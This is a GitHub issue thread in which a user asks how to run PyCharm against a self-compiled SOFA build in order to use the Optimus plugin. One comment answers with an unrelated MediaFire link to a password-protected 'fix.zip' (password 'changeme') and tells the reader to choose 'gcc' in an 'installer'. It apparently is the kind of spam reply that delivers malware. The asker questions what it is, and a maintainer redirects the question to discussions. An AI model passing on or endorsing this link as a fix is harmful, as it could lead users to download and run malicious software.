### ISSUE TITLE
How to use PyCharm to run programs directly on an uncompiled version of Sofa

### ISSUE THREAD

**Issue by zhanglepy** [sofa-framework/sofa#4948]
Do you know how to use PyCharm to run programs on Sofa compiled by yourself in Ubuntu/Windows system(sofa V21.12）? Because previously I used already compiled versions of Sofa, now I need to use a plugin Optimus (the official website only has self compiled methods).

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zhanglepy** [comment]
> Download 下载 https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file password: changeme 密码：changeme In the installer menu, select "gcc."在安装程序菜单中，选择“gcc”。

what is it?

**Comment by bakpaul** [comment]
Hello, this is not an issue. You need to create a discussion topic for general questions like that.
